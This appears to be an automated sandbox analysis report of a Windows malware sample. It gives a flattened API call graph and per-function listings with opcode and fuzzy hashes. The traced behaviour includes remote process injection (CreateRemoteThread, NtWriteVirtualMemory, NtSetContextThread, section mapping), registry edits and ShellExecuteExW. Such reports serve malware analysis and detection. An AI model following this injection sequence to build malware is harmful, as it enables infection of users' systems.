GetTokenInformation 2283->2285 2284->2280 2286 1413e91 GetSidSubAuthorityCount GetSidSubAuthority 2285->2286 2287 1413eae 2285->2287 2286->2287 2444 1411174 HeapFree 2287->2444 2445 14146a8 2289->2445 2291 1411341 2292 1411375 2291->2292 2293 14146a8 3 API calls 2291->2293 2292->2189 2294 1411371 2293->2294 2294->2292 2295 1411388 HeapFree 2294->2295 2295->2292 2297 141428a 2296->2297 2298 14118f4 2296->2298 2454 141115f RtlAllocateHeap 2297->2454 2298->2202 2298->2203 2298->2205 2300 1414299 2301 1414353 RegCloseKey 2300->2301 2302 14142a7 RegEnumKeyExA 2300->2302 2303 1414300 2300->2303 2306 1414327 WaitForSingleObject 2300->2306 2455 1412ec0 2300->2455 2498 1411174 HeapFree 2300->2498 2499 141115f RtlAllocateHeap 2300->2499 2301->2298 2302->2300 2500 1411174 HeapFree 2303->2500 2306->2302 2306->2303 2310 1413c2a 2309->2310 2313 1413c42 NtQuerySystemInformation 2310->2313 2316 1413c5c 2310->2316 2546 141115f RtlAllocateHeap 2310->2546 2561 1411174 HeapFree 2310->2561 2313->2310 2313->2316 2314 1413c84 RtlNtStatusToDosError 2314->2206 2316->2314 2547 14114ba 2316->2547 2684 1413b94 2317->2684 2319 1412a62 2319->2165 2322 1412a4e 2322->2319 2697 1411174 HeapFree 2322->2697 2325 1412cef 2324->2325 2328 1411841 2324->2328 2325->2328 2702 1414ad3 2325->2702 2328->2185 2328->2188 2330 1412d15 2330->2328 2331 1412d19 lstrlenW 2330->2331 2716 141115f RtlAllocateHeap 2331->2716 2333 1412d2a 2334 1412d30 PathFindFileNameW 2333->2334 2335 1412d78 2333->2335 2337 1412d45 lstrcatW 2334->2337 2718 1411174 HeapFree 2335->2718 2339 14149e7 6 API calls 2337->2339 2340 1412d6d 2339->2340 2340->2335 2717 1411174 HeapFree 2340->2717 2343 1414ad3 10 API calls 2342->2343 2344 1412dc5 2343->2344 2345 1412dcf PathFindExtensionW 2344->2345 2363 1412e79 2344->2363 2346 1412e29 2345->2346 2347 1412ddb 2345->2347 2350 1412e39 2346->2350 2351 1412e2d lstrcpyW 2346->2351 2348 1412deb lstrlen 2347->2348 2349 1412ddf lstrcpyW 2347->2349 2733 141115f RtlAllocateHeap 2348->2733 2349->2348 2734 141115f RtlAllocateHeap 2350->2734 2351->2350 2352 1412e9b ShellExecuteExW 2352->2352 2353 1412ea9 2352->2353 2354 1412eb3 CoUninitialize 2353->2354 2736 1411174 HeapFree 2353->2736 2354->2194 2359 1412e73 2735 1411174 HeapFree 2359->2735 2360 1412e14 2360->2359 2361 1412e69 wsprintfW 2360->2361 2361->2359 2363->2352 2365 1412acd NtOpenProcessToken 2364->2365 2366 141179e 2364->2366 2367 1412ae0 NtQueryInformationToken 2365->2367 2368 1412b33 NtClose 2365->2368 2366->2174 2366->2175 2375 141115f RtlAllocateHeap 2367->2375 2368->2366 2370 1412afb 2371 1412b01 NtQueryInformationToken 2370->2371 2372 1412b2a NtClose 2370->2372 2373 1412b14 2371->2373 2372->2368 2376 1411174 HeapFree 2373->2376 2375->2370 2376->2372 2379 14147ec 2377->2379 2378 14148bc 2378->2252 2379->2378 2380 1414880 lstrcmp 2379->2380 2381 141488c lstrlen 2379->2381 2380->2379 2381->2379 2384 1414180 2382->2384 2386 14141ac HeapFree 2384->2386 2387 14111a9 2384->2387 2403 1413ecf 2384->2403 2422 141452d lstrlen 2384->2422 2386->2387 2387->2256 2388 1414631 2387->2388 2389 1414647 2388->2389 2437 141115f RtlAllocateHeap 2389->2437 2391 141464d 2392 14111bc 2391->2392 2438 14145d2 2391->2438 2392->2256 2392->2259 2394 141465f 2395 1414672 2394->2395 2396 1414664 lstrlen 2394->2396 2441 141115f RtlAllocateHeap 2395->2441 2396->2395 2398 1414678 2399 1414699 2398->2399 2401 1414691 lstrcat 2398->2401 2402 1414687 lstrcpy 2398->2402 2442 1411174 HeapFree 2399->2442 2401->2399 2402->2401 2406 1413efc 2403->2406 2404 1414157 2404->2384 2405 1414147 HeapFree 2405->2404 2406->2404 2406->2405 2428 1414493 2406->2428 2409 1413f53 CreateFileA 2411 1413f7a GetFileTime CloseHandle 2409->2411 2412 1413f9e StrRChrA lstrcat FindFirstFileA 2409->2412 2410 1414137 HeapFree 2410->2405 2411->2412 2413 1414135 2412->2413 2416 1414001 2412->2416 2413->2410 2414 141401c FindNextFileA 2414->2416 2415 141408b StrChrA 2421 1414067 2415->2421 2416->2414 2416->2421 2417 14140d8 FindNextFileA 2420 1414100 CompareFileTime 2417->2420 2417->2421 2418 141411d 2418->2405 2419 14140be memcpy 2419->2417 2420->2417 2420->2421 2421->2415 2421->2417 2421->2418 2421->2419 2421->2420 2423 1414542 2422->2423 2436 141115f RtlAllocateHeap 2423->2436 2425 141454e 2426 1414554 mbstowcs memset 2425->2426 2427 1414577 2425->2427 2426->2427 2427->2384 2429 14144a6 2428->2429 2433 1413f48 2429->2433 2434 141115f RtlAllocateHeap 2429->2434 2431 14144b2 2431->2433 2435 1411174 HeapFree 2431->2435 2433->2409 2433->2410 2434->2431 2435->2433 2436->2425 2437->2391 2439 14145e4 wsprintfA 2438->2439 2440 14145df 2438->2440 2439->2394 2440->2439 2441->2398 2442->2392 2443->2283 2444->2284 2450 14146e5 2445->2450 2447 1414765 2448 1414763 2447->2448 2449 1414795 memcpy 2447->2449 2448->2291 2449->2448 2450->2447 2450->2448 2452 141115f RtlAllocateHeap 2450->2452 2453 1411174 HeapFree 2450->2453 2452->2450 2453->2450 2454->2300 2456 1412edd 2455->2456 2457 14131d1 2456->2457 2458 1412efe StrChrA 2456->2458 2457->2300 2458->2457 2459 1412f11 lstrcpy 2458->2459 2460 1412f35 RegOpenKeyA 2459->2460 2460->2457 2462 1412f5f RegQueryValueExW 2460->2462 2463 14131c1 2462->2463 2464 1412f82 lstrlenW RtlAllocateHeap 2462->2464 2465 14131c8 RegCloseKey 2463->2465 2464->2463 2466 1412fb0 RegQueryValueExW 2464->2466 2465->2457 2467 14131b1 HeapFree 2466->2467 2468 1412fcc CreateDirectoryW 2466->2468 2467->2465 2470 1412ff8 CreateDirectoryW 2468->2470 2471 141300a lstrcmpiW 2470->2471 2472 141301f 2471->2472 2478 14131a1 2471->2478 2473 1413032 2472->2473 2474 1413029 2472->2474 2521 14144d4 lstrlenW 2473->2521 2516 14141f8 2474->2516 2477 1413030 2477->2478 2479 1413043 lstrcpy 2477->2479 2478->2467 2480 1413060 2479->2480 2481 141306a 2479->2481 2526 1412b94 2480->2526 2487 141318c HeapFree 2481->2487 2501 1412be1 2481->2501 2485 1413129 2488 1413189 2485->2488 2489 141312e RegOpenKeyExA 2485->2489 2486 141308d 2490 141309b lstrcpy RegCreateKeyA 2486->2490 2492 14144d4 4 API calls 2486->2492 2487->2467 2488->2487 2489->2487 2491 1413150 RegOpenKeyW 2489->2491 2490->2487 2493 14130ce RegQueryValueExA 2490->2493 2494 141316b RegDeleteValueW RegCloseKey 2491->2494 2495 141317e RegCloseKey 2491->2495 2496 1413099 2492->2496 2497 14130f3 2493->2497 2494->2495 2495->2487 2496->2490 2497->2495 2498->2300 2499->2300 2500->2301 2502 1412c00 CreateFileW 2501->2502 2503 1412bfd 2501->2503 2504 1412c2d WriteFile 2502->2504 2505 1412c7f GetLastError 2502->2505 2503->2502 2506 1412c62 GetLastError 2504->2506 2507 1412c49 WriteFile 2504->2507 2508 1412c88 2505->2508 2511 1412c6b SetEndOfFile CloseHandle 2506->2511 2507->2506 2507->2511 2509 1412cd5 2508->2509 2510 1412c8f CreateFileW 2508->2510 2509->2485 2509->2486 2512 1412ca7 WriteFile 2510->2512 2513 1412ccc GetLastError 2510->2513 2511->2508 2514 1412cc3 FlushFileBuffers 2512->2514 2515 1412cba GetLastError 2512->2515 2513->2509 2514->2509 2515->2514 2517 1414203 2516->2517 2518 141424c 2516->2518 2517->2518 2519 1414208 lstrlenW lstrlen RtlAllocateHeap 2517->2519 2518->2477 2519->2518 2520 1414237 wsprintfW 2519->2520 2520->2518 2531 141115f RtlAllocateHeap 2521->2531 2523 14144f7 2524 1414524 2523->2524 2525 14144fe memcpy memset 2523->2525 2524->2477 2525->2524 2532 141493a CreateFileW 2526->2532 2528 1412bd3 2528->2481 2530 141493a 7 API calls 2530->2528 2531->2523 2533 1414966 GetFileSize 2532->2533 2534 14149b9 GetLastError 2532->2534 2535 1414974 2533->2535 2536 141497b 2533->2536 2534->2535 2538 14149c7 CloseHandle 2535->2538 2540 14149d0 2535->2540 2544 141115f RtlAllocateHeap 2536->2544 2538->2540 2539 1414984 2539->2534 2542 141498a ReadFile 2539->2542 2541 1412baa 2540->2541 2545 1411174 HeapFree 2540->2545 2541->2528 2541->2530 2542->2534 2542->2535 2544->2539 2545->2541 2546->2310 2548 14114d1 2547->2548 2549 141156a 2547->2549 2548->2549 2550 14114de RtlUpcaseUnicodeString 2548->2550 2549->2316 2550->2549 2552 14114f0 2550->2552 2551 1411554 2553 14123b4 83 API calls 2551->2553 2552->2551 2555 1411522 2552->2555 2554 141155f RtlFreeAnsiString 2553->2554 2554->2549 2555->2554 2562 14123b4 2555->2562 2558 141154a 2575 141139a memset 2558->2575 2561->2310 2563 1413223 3 API calls 2562->2563 2564 14123d4 OpenProcess 2563->2564 2565 1412475 GetLastError 2564->2565 2569 14123f0 2564->2569 2566 1411546 2565->2566 2566->2554 2566->2558 2567 14123fd 2568 141246a CloseHandle 2567->2568 2568->2566 2569->2567 2570 141242c CreateRemoteThread 2569->2570 2571 1412442 2570->2571 2572 141245b GetLastError 2570->2572 2586 141225f memset 2571->2586 2572->2568 2574 141244e CloseHandle 2574->2568 2576 1414493 2 API calls 2575->2576 2577 14113cc 2576->2577 2578 1411443 2577->2578 2579 14113e3 CreateProcessA 2577->2579 2578->2554 2580 1411405 2579->2580 2581 1411429 GetLastError 2580->2581 2582 1411409 2580->2582 2584 1411431 HeapFree 2581->2584 2583 141225f 77 API calls 2582->2583 2585 1411415 2583->2585 2584->2578 2585->2584 2587 1413223 3 API calls 2586->2587 2588 141229e 2587->2588 2589 14122a6 2588->2589 2590 141236e 2588->2590 2592 14122c8 2589->2592 2653 14119fa 2589->2653 2668 1412102 memset 2590->2668 2609 1413cb2 2592->2609 2597 1412395 2598 141239a GetLastError 2597->2598 2599 14123a2 ResumeThread 2597->2599 2598->2599 2599->2574 2601 141230a ResumeThread WaitForSingleObject 2602 141232b SuspendThread 2601->2602 2604 14122fd 2601->2604 2620 1413c91 2602->2620 2604->2598 2604->2601 2604->2602 2605 1412355 2604->2605 2606 141235a 2605->2606 2624 1411c29 2605->2624 2608 141199f 5 API calls 2606->2608 2608->2597 2610 1413cc1 NtReadVirtualMemory 2609->2610 2611 1413cd9 2609->2611 2612 14122de 2610->2612 2613 1413cde RtlNtStatusToDosError SetLastError 2610->2613 2611->2613 2612->2598 2614 141199f VirtualProtectEx 2612->2614 2613->2612 2615 14119f2 2614->2615 2616 14119c2 2614->2616 2615->2604 2617 1413cf3 NtWriteVirtualMemory RtlNtStatusToDosError SetLastError 2616->2617 2618 14119d6 VirtualProtectEx 2617->2618 2618->2615 2621 1413caf 2620->2621 2622 1413c9e RtlNtStatusToDosError 2620->2622 2621->2604 2622->2621 2625 1411c51 2624->2625 2626 1411c7e 2625->2626 2627 141115f RtlAllocateHeap 2625->2627 2629 1411c9c 2625->2629 2626->2606 2627->2629 2628 141271b 6 API calls 2630 1411d00 2628->2630 2629->2628 2631 1411ca5 2629->2631 2632 14126dc NtMapViewOfSection RtlNtStatusToDosError 2630->2632 2652 1411e3d 2630->2652 2631->2626 2635 1411e6d memset 2631->2635 2636 1411d30 2632->2636 2633 1411e46 NtUnmapViewOfSection RtlNtStatusToDosError 2634 1411e58 2633->2634 2634->2631 2637 1411e5e CloseHandle 2634->2637 2638 1411174 HeapFree 2635->2638 2639 14127da memcpy memcpy memcpy 2636->2639 2636->2652 2637->2631 2638->2626 2640 1411d49 2639->2640 2641 1411d5b memcpy 2640->2641 2645 1411d67 memcpy 2640->2645 2640->2652 2641->2645 2643 1411dbe 2644 1411e07 2643->2644 2646 1411dfa 2643->2646 2647 1411add 13 API calls 2644->2647 2645->2643 2648 1411b8a 13 API calls 2646->2648 2649 1411e05 2647->2649 2648->2649 2650 1411e14 memcpy 2649->2650 2649->2652 2651 14138ae 29 API calls 2650->2651 2651->2652 2652->2633 2652->2634 2654 141115f RtlAllocateHeap 2653->2654 2655 1411a12 2654->2655 2656 1411ad3 2655->2656 2657 1413b27 memset NtQueryInformationProcess NtReadVirtualMemory RtlNtStatusToDosError SetLastError 2655->2657 2656->2592 2658 1411a24 2657->2658 2659 1411ac0 2658->2659 2660 1413cb2 NtReadVirtualMemory RtlNtStatusToDosError SetLastError 2658->2660 2661 1411174 HeapFree 2659->2661 2662 1411a3d 2660->2662 2661->2656 2662->2659 2663 1413cb2 NtReadVirtualMemory RtlNtStatusToDosError SetLastError 2662->2663 2664 1411a59 2663->2664 2664->2659 2665 1413cb2 NtReadVirtualMemory RtlNtStatusToDosError SetLastError 2664->2665 2666 1411aa5 2665->2666 2666->2659 2667 1413cb2 NtReadVirtualMemory RtlNtStatusToDosError SetLastError 2666->2667 2667->2659 2669 14135b2 12 API calls 2668->2669 2670 141213d 2669->2670 2671 1411f7b RtlAllocateHeap HeapFree memset GetProcAddress GetProcAddress 2670->2671 2672 1412153 2671->2672 2673 1412255 2672->2673 2674 1413375 GetProcAddress 2672->2674 2673->2597 2675 1412176 2674->2675 2675->2673 2676 1411e8e 12 API calls 2675->2676 2679 141219d 2676->2679 2677 14121b7 ResumeThread WaitForSingleObject 2678 14121d8 SuspendThread 2677->2678 2677->2679 2678->2679 2679->2673 2679->2677 2679->2678 2680 1412221 2679->2680 2681 141222d 2680->2681 2682 1411c29 55 API calls 2680->2682 2683 1411e8e 12 API calls 2681->2683 2682->2681 2683->2673 2698 141115f RtlAllocateHeap 2684->2698 2686 1412a29 2686->2319 2696 141115f RtlAllocateHeap 2686->2696 2687 1413baf 2688 1413bc2 GetModuleFileNameA 2687->2688 2689 1413bba GetModuleFileNameW 2687->2689 2694 1413ba9 2688->2694 2689->2694 2690 1413bee 2690->2686 2691 1413c00 GetLastError 2690->2691 2701 1411174 HeapFree 2691->2701 2694->2686 2694->2687 2694->2690 2699 1411174 HeapFree 2694->2699 2700 141115f RtlAllocateHeap 2694->2700 2696->2322 2697->2319 2698->2694 2699->2694 2700->2694 2701->2686 2719 1414a4d 2702->2719 2705 1412d03 2705->2328 2709 14149e7 CreateFileW 2705->2709 2706 141452d 4 API calls 2707 1414aee 2706->2707 2730 1411174 HeapFree 2707->2730 2710 1414a17 WriteFile 2709->2710 2711 1414a0d GetLastError 2709->2711 2713 1414a36 GetLastError 2710->2713 2714 1414a2d SetEndOfFile 2710->2714 2712 1414a45 2711->2712 2712->2330 2715 1414a3e CloseHandle 2713->2715 2714->2715 2715->2712 2716->2333 2717->2335 2718->2328 2720 1414a61 2719->2720 2728 1414ac8 2720->2728 2731 141115f RtlAllocateHeap 2720->2731 2722 1414a70 2723 1414ac2 2722->2723 2724 1414a85 GetCurrentThreadId GetSystemTimeAsFileTime 2722->2724 2725 1414a9a GetTempFileNameA 2722->2725 2722->2728 2732 1411174 HeapFree 2723->2732 2724->2725 2725->2723 2727 1414aa9 2725->2727 2727->2728 2729 1414aad PathFindExtensionA lstrcpy 2727->2729 2728->2705 2728->2706 2729->2728 2730->2705 2731->2722 2732->2728 2733->2360 2734->2360 2735->2363 2736->2354 2738 401107 CreateFileA 2737->2738 2739 401126 GetLastError Sleep 2738->2739 2740 401139 2738->2740 2739->2740 2740->2738 2741 401142 2740->2741 2742 4011ea 2741->2742 2765 40172f 2741->2765 2744 4011d6 CloseHandle 2744->2742 2746 401178 WriteFile 2747 4011a8 GetLastError 2746->2747 2750 40115d 2746->2750 2748 4011c2 memset 2747->2748 2749 4011b6 Sleep 2747->2749 2772 401207 HeapFree 2748->2772 2749->2748 2749->2750 2750->2744 2750->2746 2750->2749 2753 4010d6 GetLastError 2752->2753 2754 40105c 2752->2754 2756 4010e2 2753->2756 2775 4011f2 RtlAllocateHeap 2754->2775 2757 401062 2758 4010c2 2757->2758 2759 401068 ReadFile 2757->2759 2762 4010cb CloseHandle 2758->2762 2760 401080 RtlReAllocateHeap 2759->2760 2761 4010a4 GetLastError 2759->2761 2760->2758 2763 40109e Sleep 2760->2763 2761->2762 2761->2763 2762->2756 2763->2758 2763->2759 2770 40176d 2765->2770 2767 4017dc 2768 4017da 2767->2768 2769 401812 memcpy 2767->2769 2768->2750 2769->2768 2770->2767 2770->2768 2773 4011f2 RtlAllocateHeap 2770->2773 2774 401207 HeapFree 2770->2774 2772->2744 2773->2770 2774->2770 2775->2757 2805 1411081 2806 1411093 2805->2806 2807 141108a WaitForSingleObject 2805->2807 2807->2806 2776 401033 2777 401034 CreateMailslotA 2776->2777 2778 4010d6 GetLastError 2777->2778 2779 40105c 2777->2779 2781 4010e2 2778->2781 2790 4011f2 RtlAllocateHeap 2779->2790 2782 401062 2783 4010c2 2782->2783 2784 401068 ReadFile 2782->2784 2787 4010cb CloseHandle 2783->2787 2785 401080 RtlReAllocateHeap 2784->2785 2786 4010a4 GetLastError 2784->2786 2785->2783 2788 40109e Sleep 2785->2788 2786->2787 2786->2788 2787->2781 2788->2783 2788->2784 2790->2782 2791 3820b2 VirtualProtect 2791->2791 2792 3821bb 2791->2792 2808 1413afa 2809 1413b04 2808->2809 2810 1413b0b VirtualFree 2809->2810 2811 1413b1a 2809->2811 2810->2811 2793 382346 2794 38235c 2793->2794 2799 381d25 VirtualAlloc 2794->2799 2796 382378 2801 381f6c VirtualProtect 2796->2801 2800 381d9d 2799->2800 2800->2796 2802 38202d 2801->2802 2803 382066 VirtualProtect 2802->2803 2804 3820ad 2803->2804

                      Executed Functions

                      Function 01413ECF, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209filememorytimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 142 1413ecf-1413f01 144 1414157-141415e 142->144 145 1413f07-1413f25 142->145 147 1414147-1414151 HeapFree 145->147 148 1413f2b-1413f4d call 1414dc8 call 1414493 145->148 147->144 153 1413f53-1413f78 CreateFileA 148->153 154 1414137-1414141 HeapFree 148->154 155 1413f7a-1413f98 GetFileTime CloseHandle 153->155 156 1413f9e-1413ffb StrRChrA lstrcat FindFirstFileA 153->156 154->147 155->156 157 1414001-141401a 156->157 158 1414135 156->158 160 1414063-1414065 157->160 158->154 161 1414067 160->161 162 141401c-141402e FindNextFileA 160->162 165 141406b-1414071 161->165 163 1414030-1414053 162->163 164 1414056-1414060 162->164 163->164 164->160 166 1414081 165->166 167 1414073-1414079 165->167 170 1414083-1414089 166->170 171 141408b-14140ab StrChrA 166->171 168 141411d-1414133 167->168 169 141407f 167->169 168->147 169->166 170->171 173 14140d8-14140ea FindNextFileA 170->173 174 14140b6-14140b9 171->174 175 14140ad-14140b2 171->175 181 1414100-1414113 CompareFileTime 173->181 182 14140ec-14140fd 173->182 178 14140bb-14140bd 174->178 179 14140be-14140d5 memcpy 174->179 175->174 177 14140b4 175->177 177->174 178->179 179->173 181->173 183 1414115-1414118 181->183 182->181 183->165
                      APIs
                      • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01413F6D
                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01413F81
                      • CloseHandle.KERNEL32(?), ref: 01413F98
                      • StrRChrA.SHLWAPI(014111A9,00000000,0000005C), ref: 01413FA4
                      • lstrcat.KERNEL32(014111A9,0141825D), ref: 01413FDE
                      • FindFirstFileA.KERNELBASE(014111A9,?), ref: 01413FF4
                      • FindNextFileA.KERNELBASE(?,?), ref: 01414026
                      • StrChrA.SHLWAPI(?,0000002E), ref: 01414094
                      • memcpy.NTDLL(0141618C,?,00000000), ref: 014140CD
                      • FindNextFileA.KERNELBASE(?,?), ref: 014140E2
                      • CompareFileTime.KERNEL32(?,?), ref: 0141410B
                      • HeapFree.KERNEL32(00000000,0141618C,01418049), ref: 01414141
                      • HeapFree.KERNEL32(00000000,014111A9), ref: 01414151
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Find$FreeHeapNextTime$CloseCompareCreateFirstHandlelstrcatmemcpy
                      • String ID: pnls$}nls
                      • API String ID: 2101777934-4252118926
                      • Opcode ID: 558aafc92e2d9df2e98636c60d96cf5ff44cb43fc9fcd5acebe338e712f99de4
                      • Instruction ID: 78432c1be7b8b0ec9c02010508ac2cdb9724b9feb85ab91e9e00d511934bc10f
                      • Opcode Fuzzy Hash: 558aafc92e2d9df2e98636c60d96cf5ff44cb43fc9fcd5acebe338e712f99de4
                      • Instruction Fuzzy Hash: 63816AB1D00219AFDB21DFA9DC88AEEBFB9FB48300F15456AE515E2264D7709A44CF60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01411C29, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 198nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 240 1411c29-1411c4f 241 1411c51-1411c58 240->241 242 1411c6c-1411c74 240->242 241->242 243 1411c5a-1411c6a 241->243 244 1411c77-1411c7c 242->244 243->244 245 1411c8a-1411c92 244->245 246 1411c7e-1411c85 244->246 248 1411c94-1411ca3 call 141115f 245->248 249 1411cca-1411d05 call 141271b 245->249 247 1411e85-1411e8b 246->247 254 1411cb1-1411cc8 call 1414b60 248->254 255 1411ca5-1411cac 248->255 256 1411e40-1411e44 249->256 257 1411d0b-1411d35 call 14126dc 249->257 254->249 259 1411e67-1411e6b 255->259 261 1411e46-1411e52 NtUnmapViewOfSection RtlNtStatusToDosError 256->261 262 1411e58-1411e5c 256->262 257->256 268 1411d3b-1411d4e call 14127da 257->268 259->247 263 1411e6d-1411e80 memset call 1411174 259->263 261->262 262->259 266 1411e5e-1411e61 CloseHandle 262->266 263->247 266->259 268->256 271 1411d54-1411d59 268->271 272 1411d67-1411d6c 271->272 273 1411d5b-1411d64 memcpy 271->273 274 1411d99-1411dbc memcpy 272->274 275 1411d6e-1411d76 272->275 273->272 277 1411dcf-1411dd3 274->277 278 1411dbe-1411dcc 274->278 275->274 276 1411d78 275->276 279 1411d7d-1411d97 276->279 280 1411dd5-1411de8 277->280 281 1411deb-1411def 277->281 278->277 279->274 284 1411d7a 279->284 280->281 282 1411df1-1411df8 281->282 283 1411e07-1411e08 call 1411add 281->283 282->283 285 1411dfa-1411e05 call 1411b8a 282->285 288 1411e0d-1411e12 283->288 284->279 285->288 288->256 290 1411e14-1411e38 memcpy call 14138ae 288->290 292 1411e3d 290->292 292->256
                      APIs
                        • Part of subcall function 0141271B: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01412776
                        • Part of subcall function 0141271B: memset.NTDLL ref: 0141279B
                        • Part of subcall function 0141271B: RtlNtStatusToDosError.NTDLL(00000000), ref: 014127B7
                        • Part of subcall function 0141271B: NtClose.NTDLL(?), ref: 014127CB
                      • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411D5F
                      • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411DB0
                        • Part of subcall function 01411ADD: GetModuleHandleA.KERNEL32(014180DB,?,CCCCFEEB,01411E0D,?,?,?,00000000), ref: 01411B10
                        • Part of subcall function 01411ADD: memcpy.NTDLL(?,014175E0,00000018,0141845C,01418400,01418451), ref: 01411B7B
                      • memcpy.NTDLL(?,01412486,00000800,?,?,?,00000000), ref: 01411E20
                        • Part of subcall function 014138AE: memset.NTDLL ref: 014138CD
                        • Part of subcall function 01411B8A: memcpy.NTDLL(CCCCFEEB,014175F8,00000018,CCCCFEEB,0141845C,CCCCFEEB,01418400,CCCCFEEB,01418451,CCCCFEEB,01411E05,?,01412386,?,?,00000000), ref: 01411C1B
                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01411E4B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01411E52
                      • CloseHandle.KERNEL32(00000000), ref: 01411E61
                      • memset.NTDLL ref: 01411E75
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 014126DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01412709
                        • Part of subcall function 014126DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 01412710
                        • Part of subcall function 014127DA: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01412848
                        • Part of subcall function 014127DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01412865
                        • Part of subcall function 014127DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 014128A7
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocateCreateFreeModuleUnmap
                      • String ID: pnls
                      • API String ID: 17049359-141991303
                      • Opcode ID: 59565d1570c0fc81f6e808788970296c2f4aebdb9d01563b104f1ebace45eed8
                      • Instruction ID: 3fe63678d78ee43073aabcfdc20b74d303d6598a2e010bf86e35bcc1ef97ecd8
                      • Opcode Fuzzy Hash: 59565d1570c0fc81f6e808788970296c2f4aebdb9d01563b104f1ebace45eed8
                      • Instruction Fuzzy Hash: 4D8169B0D0060AEFDF21DFA8C884AAEBBB5FF04704F14456AE605A7365E770EA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01412A7B, Relevance: 9.1, APIs: 6, Instructions: 81nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtOpenProcess.NTDLL(0141618C,00000400,?,01417614), ref: 01412AC3
                      • NtOpenProcessToken.NTDLL(0141618C,00000008,0000000C), ref: 01412AD6
                      • NtQueryInformationToken.NTDLL(0000000C,00000001,00000000,00000000,0141618C), ref: 01412AF1
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • NtQueryInformationToken.NTDLL(0000000C,00000001,00000000,0141618C,0141618C,0141618C), ref: 01412B0E
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      • NtClose.NTDLL(0000000C), ref: 01412B2D
                      • NtClose.NTDLL(0141618C), ref: 01412B36
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Token$CloseHeapInformationOpenProcessQuery$AllocateFree
                      • String ID:
                      • API String ID: 770469984-0
                      • Opcode ID: 532c0c0b89ba4fbd119b863e44f78a87e123ee7113ccf57ecaacd08ccb1e0d1f
                      • Instruction ID: 67701bdd7679ac1069881abd663ca0e8c60b8003a0896b5e8c622db73d412163
                      • Opcode Fuzzy Hash: 532c0c0b89ba4fbd119b863e44f78a87e123ee7113ccf57ecaacd08ccb1e0d1f
                      • Instruction Fuzzy Hash: 08212872A00219BBDB119FA5CC44EDEBFBDFF18740F104066FA04E6224D7B19A459BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 01413789, Relevance: 7.6, APIs: 5, Instructions: 93nativethreadCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 014137AB
                      • GetLastError.KERNEL32(?,00000318,00000008), ref: 0141389E
                        • Part of subcall function 01413D34: NtAllocateVirtualMemory.NTDLL(014137D3,00000000,00000000,014137D3,00003000,00000040), ref: 01413D65
                        • Part of subcall function 01413D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413D6C
                        • Part of subcall function 01413D34: SetLastError.KERNEL32(00000000), ref: 01413D73
                        • Part of subcall function 01413C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413CA9
                      • memcpy.NTDLL(00000218,01414E62,00000100,?,00010003,?,?,00000318,00000008), ref: 01413826
                        • Part of subcall function 01413CF3: NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                        • Part of subcall function 01413CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                        • Part of subcall function 01413CF3: SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 0141387D
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01413880
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$Status$Last$MemoryVirtual$AllocateContextThreadWritememcpymemset
                      • String ID:
